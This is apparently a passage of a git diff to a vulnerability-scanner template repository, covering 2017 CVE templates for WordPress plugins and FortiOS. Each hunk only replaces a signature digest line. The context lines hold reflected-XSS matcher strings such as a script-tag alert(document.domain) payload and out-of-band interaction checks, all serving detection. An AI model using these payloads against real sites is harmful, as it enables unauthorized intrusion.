+57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 4a0a004730450221008db709d7da6769136e78d233f199f323e37fcd383071037b00748fc9d1fbddfd0220584eaedf0f630d0c3c24339dc20df170e1e578eab148975e7156d751371dc634:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b265a3ffc6366b0e9026439bcf55a1320164751dd00681db9aa96b67ed8380b3022100d2764eeeb6cef132f7726170359b5b5cd223cd679a09a7c906e3b1f48d66c197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 0fae32ad875..274aea1a311 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4b0a00483046022100ed03fd49e36e14bb22a1136a4a60e729d91c21318b8060d15f1e56bb7ab2b2e7022100f49f274ee625ccbd7a3f4a13fcee5ed7e0970f404193c6d2f2b9efe1c07dd7e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bdc2ab53be5edce54b8eae00fb25aff69a479c6cd51675030c1c373333d28442022100ef88e7dec45cd48deb7d68088fbec02f69261e8d5c9326ac0853b8da030d9954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index a9291c87ad1..fa5274a9d77 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4a0a00473045022067b154a3eff2653bd2ec5629b78d38fc62bef0e69006fb52d02d4d7a50bb16d3022100ffb5cbdefed940ee47ea5413cb495b58cbf19b8f38c35dec200371cf1ee42b8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd63fb0bac5462628c8725047ef31ae06ca8f6234b6045744407c84fb8623fa802210089546150f8ac8bda2b4a9ab31b465593dffa1fee51f4fa5b005f4ec8ac511888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index e39fb9a1cea..aba85727701 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 4a0a00473045022066d2c01df29b029e99a66c5f9fea6f49d45127f2cdca2e9d0aecfbe3a19133980221009f4b83c5497dc7e7d3ed866a3c6f16f659e6f78655c28634d3382b56ecd82aff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f1e650663e829e5ee64181cb3536ae1d76db8db83b005ab2585ad3d906cb517022077180905f0d9629b3c8a6b9dd4d46460c8a03e56a725a22c2dbd1ec2bbeba574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 3abd9a68e46..6f2892edb1a 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 490a004630440220784370e16558872e1658a2777eb945b9444e9307c0046433b4c37b22a952504c02206be11a5c5914f0193212f24087c9dd787bad49d0b49aaaaf0faddc84b12b4095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006b862fe4786255937e67a41011135a367a61b98e1b8b32ac683b86864d9c285022100dc8c3facff253b37f3940d9390511a465ed66cbc3a770d12d6f63113763acf93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 09da8859846..e55be0931aa 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 4a0a00473045022100fc09f5e5b69698c717e8f5005ce7424790781f000c2ca71be0ce5225a4c1060302207955b9ddb440818904b207319a6c97ff3f815b8c5e927d48975a996f1044d820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4f879b8dd18b728aab9ce866d93e2e2e6560e0215ddf194698b778bcc2b8c100221008288d43bc8fbeb6a1b25a64605862023160db344078d4a808604edb26750c9ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index fb46d93a372..0c11dce5026 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 490a0046304402200eb75b8fa48ec639e72af1cdd49737d0246eb081ae0da45c0272976ea2efe5970220394f3d1c590620bebe9a034285277ca4d9a57359a990e4a15ccfb188afc5eba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041b3ea83e90b2a8d85ec0418a550eda8f5211e404fc43b0f016e021d35751e3a022100fea821212b0c2af1616140ccc3c05cf5e2c5c18e80d0bf7675174179c58a2ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 4e62324fbd2..29b63d85be2 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4b0a0048304602210089a02b3ba9526701b9c3b05f1104c745ca21df3da04cf0686856c89a5617586a022100953531d3181393532b46f892c8a69ad9fc4fca2dffbf8108edf939ff0719b17f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201cf4cc53abf6dd008e274753118752dfcd7b27443568720fb416d102672fb9ef022100959881bbcdee0c3d070fcf3e7ed1e1ef4a3d9ae961e87451224cff3e758e136e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 2a3eece9219..f561bb18d97 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 490a0046304402205827a83f2ea4c81e6333af6c013a822283a32f468aa3f4ba2f29f511404bf5bd02204ac5068a3be23b91398acc435ed3e5a16c83b53994df1b6e51e67cc78349baec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022067b5bd50022a36d7cba7608eb783fb0939fb1a13b878e9c9b14c976df5433b0a022100d2b13453d628f267f1b9f0bf8e477e98908baf31b6b04a08f1ec6bd0a99b41cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index f6af0fbbab6..41fc49c592a 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4b0a00483046022100e13912f43232b2132c75739408c474a76bc9e9e1ba930cf7f7c3f4e599c253ba022100ca6b289761f099bae67763a91c39537679c316f83a53da44851932be94abe127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203dad84a7b7eb15ff7b8ed3377262e616bc877b440256f19d43b589b5589a0bdb022100a9374a6a96df0e18937db1fcc882d3367302e0df4e2330e480edda62e1659436:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index b635b2b12d6..3596f90d449 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4a0a00473045022100a0618914474906be4d3ef5e83ba255b7fe5076f09a8de20fbde4bed822218c04022057580d9fae4f575df837ce58e7f5843e4a7c21aadd74d4280e37647aaa09ad61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb080d8ec88897ead10cdaf2f5f996d1306d7e4c915e877076b7d28db670cb7d0220330ae062df8fe19025dcefb359e05de0111b7f52355c26f6e89af14119160a21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 2eedeb218f0..4616dd45af3 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a004730450220317a4a290f6f21a7e319a4f037231b68c7e4eb884a1c7210811daeb31c02620b02210085f986f823837958c76ab93d532684227aab48076ab0c9c92086c16388ff1bd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220462a43b97e661264967605c17e982fb852e90bf4f4a125230e5cffabc8af4514022100b05ffd594ef8a598696260df34a6775c58668c8e2b69c64d52783edfd83c3782:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index 9b189b36503..c286388800b 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 4a0a00473045022028862ed30c1dac76ba897b2bcba0863f16705bb5afef935b9ad7d70c7a9db495022100cb2fe8cf3fbe40f85603b8ebdd861d075033fe7197f5f802cd0144817340cbe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a735b6ffa77b3555ecc1bd979e0fac9246866fbfb089764b30d2bd1e3c0028f0220497d8699611b47d8cc27122026b00681a340883e64ba6c56ff0394f567a65db9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 5af50e75b2a..4aba96d0dd7 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 4b0a0048304602210085537ea869c03bf8d41fb4bc0ac90f8785a62a8359baa63b5cad45224537f84b022100d21ea0af070fa94e216464fcf8f62506a77cd3291cd7f80d3f9cf54f7e6f8453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa79a5818dfa16e141c54b21ef3d506e77baf38371a3c4788378fd5792b05a2c022100ff05cdb9a5e18735135ab7e58b90908f18a248ac428299cdd685831785b440c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index e7020743b33..8e0fb379c79 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c4f171654f947f3f3b93859beeddef80595e30d5b031c370b7147e0a1d6341702210089ce08f10a87a69214d52b767d7932666692f7ba8f1490844a9d42d1d0a7307d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204369de058841b625898d08ed3ce1b3ae692815677e690b1b40a0eceb748e1986022100a2cb46b3444c29caefd68948e1511ec725bc60a77b258dc69a837bd5f1c0c54e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index fe1e9ec1fe1..58d975785f2 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4b0a00483046022100fc7e293bf70c52d8c1aafa52eb2cdd0dbe9bed1b7bb222aeaf5abfdaa262fb5d022100e596313c642197093c685f0bd1be7358e31dccf01f2cdae80f34660f9ff46a55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e272db137483a4989e0132c8986f2bd4564105371a9340cd7f4ad347bf811cc022100fd0b530090f2bf9a0cdbc31865129e99d63095e662d5e543ead6740e20fb0a57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 99ceccc8539..77c00b5ae78 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4b0a00483046022100c7e488843c846b29db012ea4762dca7de49a65bd831c4bf207f8969c55937ece022100a2aab2b21b595efdcd51746730b93234672795852dbc02298a36ac1d1c5d8044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008071be52f8e0e7640be4b2dffb6554c2bc05b5b0a30373743311c1d53d86beb40221008acde688d1c4e8873238708faed3f61075edc12d6054eca4d7136ca95fd81234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 12a15210525..947ef07679a 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 490a00463044022026309912e05392dbbc19026bd035e46e446a1b9ed098d56bc6d8e752c4e2cdfb02200b42df775af8b8858afaf0c140d4f004f4c78c021d4d1c41b301996c56549f1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202730644ab6509c8b595e1f1932789f992cd9f6def19387788f22d4a000d79fe8022100c9e8fe04bccf9c470c317ce8cda75337adf168c009fd9b6e0cc783a219af9980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 37d4d30a1e4..b39e805ee6e 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 4b0a004830460221008f10d6d4b2924c33b178b9aa258ff819fd72d856b4379bc6701eb6ae7fd7017c022100de4dae5652c655820c47ab793a7ac8a9257529167d26124a783161133d7e5d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100adb299550a2bc872ad482adfeb31bcc8a9c781fdba91aa2259c601ce8e096eb002210097aa2415619a3fc8f5f28648b108909819829f1b200c8de8905e3922e865620d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 0ad07c5c00e..5ba0f598232 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 490a00463044022007f5352eaad26b563b63cac7eb445f59ae33233d8ccfa4fe138e563eaf54ea9202204543621d71a87677da76ec0e3936ae86a39c483c71cfcb1104a86773c6a3485c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054710e886484aee962529340572c2316047d90098bae037269d2f68590f5b2ed022100c39f07a2c5cff70ded7cff567797e1a61b57a20caa9931d516c2497336788e64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index c8c8cfe624f..5300a5f2e82 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 4a0a0047304502206fc28f8307bc912ed0609b29950525418d5944a6cf8b190fc5d39b59e69d77da022100fc2fc1d9febfc9e6b148f73b3f91ae90408daed21037e51a33a922d40c2f440c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220020d864d4fb9bd1c9ca7290caa9e5be9fdc34781b5e03632d82c008200d4f7dd022100a2fbd7cdf292c60297bb4eb8efddc18dc861db0f1872b93e77cc2afece0bd374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index c427b21919f..1df90b8999a 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 490a0046304402204f94185944adab79b2218ca62632d5fed4e4a6a1b2bc24cfac7896237d87596802202b1dc3d07b4985123daf6dc8262537f07f372968e8265f8fa1571c2cb160fff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005468dc4401618a99e684629a456b0aa78a9d7132be1a63cc69f1c4655380c5b02204b26f79f308883db40cf77a71b03e1876cffb40cca9ac38d3c4f7cde75cfcac5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 08423e0bf98..28fccea1b63 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4b0a00483046022100ef647f482386b7226d99fe41803d46841de41ab942f0bf430c7186c117accba7022100eabf5b88a86d81832c87c89e5d001145aa3b7794e2d3ca21a7cb92fc886d52c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a75058fcd81f2ab68e9effef962dbf6c55d4ebdb431f413d6ed0a092186e465022039bc32ba3bc75d82a8cc93c01e6e8b2c6d64651c67a7cd159680578947ef5951:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 01b4866d7b0..011b6b4c147 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 4b0a00483046022100a159a42c210b262bdd9f2d103d818a3a1e7938db5febfbf248a3265971873c620221008b4aad7e8467010949a82c1468beb640200f5d578c972ad2f8d35a6500119132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022045595d100f356220d26a4598306e2b0207e08f982621a936bc82544f9d522624022041fc74f03cecef20e88b0608f63ddc856b19206ee2c57edfd04f0f61c2299c06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18580.yaml b/http/cves/2017/CVE-2017-18580.yaml index 7d3b54b4f5b..f9a80dc566d 100644 --- a/http/cves/2017/CVE-2017-18580.yaml +++ b/http/cves/2017/CVE-2017-18580.yaml @@ -107,4 +107,4 @@ http: - 'status_code == 200' - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")' condition: and -# digest: 4a0a00473045022100a10d86c85943469fb143c22492d95fae83b9622554e621ace26bd3b347d3576d02200ac5463be0e370d46f943ef5d99e1e54202c52a82dc3e20c87b90f829fa16eba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201648ebef4631a17814853e56f6ac8caebeee96ba1b66ff2c547fa6b64a84eda0022100856d464307bf5d3901162a9dc708456e6475b3b42cd45269d2aa0ba93c6df9b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18590.yaml b/http/cves/2017/CVE-2017-18590.yaml index 86d4e050b57..5faeba72deb 100644 --- a/http/cves/2017/CVE-2017-18590.yaml +++ b/http/cves/2017/CVE-2017-18590.yaml @@ -63,4 +63,4 @@ http: - 'contains(header_2, "text/html")' - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' condition: and -# digest: 4a0a00473045022100b66b4cf372df3a08bab5ba98f15bfb8f89ec078c471daf5f1ec0e8e2a1fa2a8b02203442b097739929ed0b6db8d40791753b8ce5a33bae95a3bf71ba266994e29386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210091b2b6bc2c58ef243f5101ccfd9cb8c5fbaa399d469a01723c583cb3f80a2b340221009f7279b3e3938beb4ff8048036db9e7998a88c0aa82a35d17e17e7398ed8252b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 739d3688089..c58c5ce464c 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -58,4 +58,4 @@ http: part: body words: - "console.log" -# digest: 4a0a0047304502201d73e6cd2c3daaac61a8fa4cbd61b268b768031feaedd903a575fe74bda50af5022100c884bd17e9e103a88c0f1ab5bcf8b77b31ba4c83090c6a1620333d22ae8844a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220339831afe331eb5081da071445f29fc8ce9d425f5125e825979211f3b6478ca3022100f6903c526a474e5655adb18e2b63370269989bbcf1970c671feb149568614434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index b7d37fe29f1..1efa772d196 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -40,4 +40,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a00473045022055553ff8041ea6d6c752f6694c829f09300d8856038142128610ca87cdcd0eee022100a97193ff3aa5b57badbcb57af1a702cd59caaa04aed5d7424fb9aeb59871035c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220516f77b5710eb2710e0b0ad603c66773a7a4c6ec2955c0cedacca96b7cec186d02210083836340e539ab8afad67c3aa7e08f296a140638a7b8db79011cadd77b46637d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-20192.yaml b/http/cves/2017/CVE-2017-20192.yaml index ed13e408cf2..1090297eacf 100644 --- a/http/cves/2017/CVE-2017-20192.yaml +++ b/http/cves/2017/CVE-2017-20192.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "<img src=x onerror=alert(document.domain)")' condition: and -# digest: 4a0a0047304502201150ee50f311142da8bce3fb53923369ee0e5343d1a0432e27bf4e5c2b59587e0221009cc5e0d00be853de16d1aec2ff3c76ea843a06ae4946373ea623355aa7eb9f2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a7bb3c911ebe169aff400430a35644c2c83c870755b365aa7eb1431ce02010fe022100ffc14f5b199c81b733c3e0a069cd772a8815be8ef0057fcaa4994e9765b2f931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-20194.yaml b/http/cves/2017/CVE-2017-20194.yaml index e4eedd86387..a01309b193b 100644 --- a/http/cves/2017/CVE-2017-20194.yaml +++ b/http/cves/2017/CVE-2017-20194.yaml @@ -52,4 +52,4 @@ http: group: 1 regex: - "(?mi)Stable tag: ([0-9.]+)" -# digest: 4a0a0047304502203ba6ed6f92b9f745d67ad8b4894c120180d122a0006d36552cd63890a6b8b08d022100dd48e1cab1340a737e08fd7f70841c01e568cd5b266b46a66ce6b0743515b0c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207880894822b1e8d5936b997ec84c639b248fd89704c95a26f173c291ee0184f902207ce67bd89835a222f811b43b27315c07518961fd9cb7f7ed77aad98c8e65a7a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3131.yaml b/http/cves/2017/CVE-2017-3131.yaml index 74f5a1c7348..ed11f93bf68 100644 --- a/http/cves/2017/CVE-2017-3131.yaml +++ b/http/cves/2017/CVE-2017-3131.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a2cd165704d1a81f8c8152a7bcd17b22433bd3ad76d3b677e1e5037f4611d2ab022065b46971539778e40fdcce64f39fa4d4d463fc25590bf1f58d7e52beeda7e6cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008566bee3eb0e3485c404452f94e58be44939c874ca02433fb4202bced56c708b02201798c1f04c96f7c349998566e3c7e1c4229571580b40208878ec40235b4452a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3132.yaml b/http/cves/2017/CVE-2017-3132.yaml index 07cd0852a4a..1d85e9c9cb9 100644 --- a/http/cves/2017/CVE-2017-3132.yaml +++ b/http/cves/2017/CVE-2017-3132.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022031e18b5891fdc208013ae8eee6b47f0aa9a7ca8de58da057bf9190ef2282eda702202b9001b3b3a63d13f39089eb33b8991cbc9ccace75545a631819c69ecdef4231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220764958a230a7594de468fe25d96ba08fc4c9951d0831f4fb4c4a0f8b52ed8383022100e1074bb285ee331ceab8ee54532d7d1d53d297cc0cd345e0fd2070580e17650c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3133.yaml b/http/cves/2017/CVE-2017-3133.yaml index ca55a3595cc..2d8a01b8631 100644 --- a/http/cves/2017/CVE-2017-3133.yaml +++ b/http/cves/2017/CVE-2017-3133.yaml @@ -78,4 +78,4 @@ http: regex: - 'ccsrftoken_([0-9_a-z]+)="([A-Z0-9]+)";' internal: true -# digest: 4b0a00483046022100e12152cdfe790b58f460db3ecfd26614a3c3d9ed093555bab2b96cc02f7918e7022100ffaaeec5b6a6831373c90f51104d67b7bcdb9624603689bb49ee0b020480e808:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200092104da71c70862a5ea27bd743e2d6d5f0c475bcc03214d14b0028604add7c022100927db0a43b4216a0f96f23752b316997540a474f52ad6d7d48c8f4272ba7c753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 4e76c3205f8..d09005a9017 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -63,4 +63,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100a4504bf2e55fb0d345fba8b9ba7dcfbf81c1b81b9b5a7b00557cd157c0e5153e022100a38106166b358e425fe8abc5c4a2d75c6920b7d98df57ea1a226c00d8143bfb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 